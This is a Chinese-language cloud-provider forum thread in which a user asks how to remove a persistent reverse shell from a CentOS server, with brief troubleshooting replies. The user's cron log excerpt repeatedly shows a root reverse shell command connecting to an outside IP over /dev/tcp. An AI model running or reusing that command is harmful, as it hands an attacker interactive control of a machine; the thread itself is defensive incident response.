阿里云
发表主题 回复主题
  • 1058阅读
  • 3回复

[求助]反弹SHELL如何清除

级别: 新人
发帖
1
云币
2
大家好,最近我们的CENTOS服务器中了反弹SHELL。幸好我们有防火墙。反弹SHELL无法兴风作浪。但是我们KILL掉反弹SHELL的进程,他还是会继续起来。而且由于反弹SHELL无法连接远程服务(因为防火墙挡住了),一直在重启连接。 P2!+ZJ&  
我们查看了计划任务crontab -l .没有发现任何异常。但是在cron的日志里面,就发现了反弹SHELL的启动日志。如下: [X%Wg:K  
  1. Apr 10 08:23:01 iZgw82jiymwc5j3yi9fjg3Z CROND[2841]: (root) CMD (/bin/bash -i >& /dev/tcp/115.28.7.71/29999 0>&1)
  2. Apr 10 08:24:01 iZgw82jiymwc5j3yi9fjg3Z CROND[3716]: (root) CMD (/bin/bash -i >& /dev/tcp/115.28.7.71/29999 0>&1)
  3. Apr 10 08:25:01 iZgw82jiymwc5j3yi9fjg3Z CROND[9405]: (root) CMD (/bin/bash -i >& /dev/tcp/115.28.7.71/29999 0>&1)
  4. Apr 10 08:26:01 iZgw82jiymwc5j3yi9fjg3Z CROND[10350]: (root) CMD (/bin/bash -i >& /dev/tcp/115.28.7.71/29999 0>&1)
  5. Apr 10 08:27:01 iZgw82jiymwc5j3yi9fjg3Z CROND[11148]: (root) CMD (/bin/bash -i >& /dev/tcp/115.28.7.71/29999 0>&1)
  6. Apr 10 08:28:01 iZgw82jiymwc5j3yi9fjg3Z CROND[11890]: (root) CMD (/bin/bash -i >& /dev/tcp/115.28.7.71/29999 0>&1)
  7. Apr 10 08:29:01 iZgw82jiymwc5j3yi9fjg3Z CROND[12568]: (root) CMD (/bin/bash -i >& /dev/tcp/115.28.7.71/29999 0>&1)
但是再去仔细看crontab -l.里面也没有找到这个命令。请问如何能够找到这个日志里面的执行脚本或者执行命令的位置,谢谢 0R-J \  
0z =?}xr  
级别: 论坛版主
发帖
13406
云币
30688

只看该作者 沙发  发表于: 04-15
楼主您好, A1\;6W:  
8Md*9E#J("  
是否可能在文件系统里搜索某些关键字符(如IP地址),看是否能搜索到包含这些关键字符的文件?
Debian 是一个自由的操作系统 (OS),提供您安装在计算机上使用。操作系统就是能让您的计算机工作的一系列基本程序和实用工具。
级别: 新人
发帖
1
云币
1
只看该作者 板凳  发表于: 05-10
Re反弹SHELL如何清除
我也是整天反弹 不知道怎么排查
级别: 菜鸟
发帖
62
云币
92
只看该作者 地板  发表于: 05-12
检查自启动进程 非系统和自己安装的都 kill -9掉 e%EO/ 2"  
关闭 非安全的 tty连接 X'U~g$"(+  
删除 非法用户
发表主题 回复主题
« 返回列表上一主题下一主题

限100 字节
如果您提交过一次失败了,可以用”恢复数据”来恢复帖子内容
 
验证问题: 65 + 27 = ?
上一个 下一个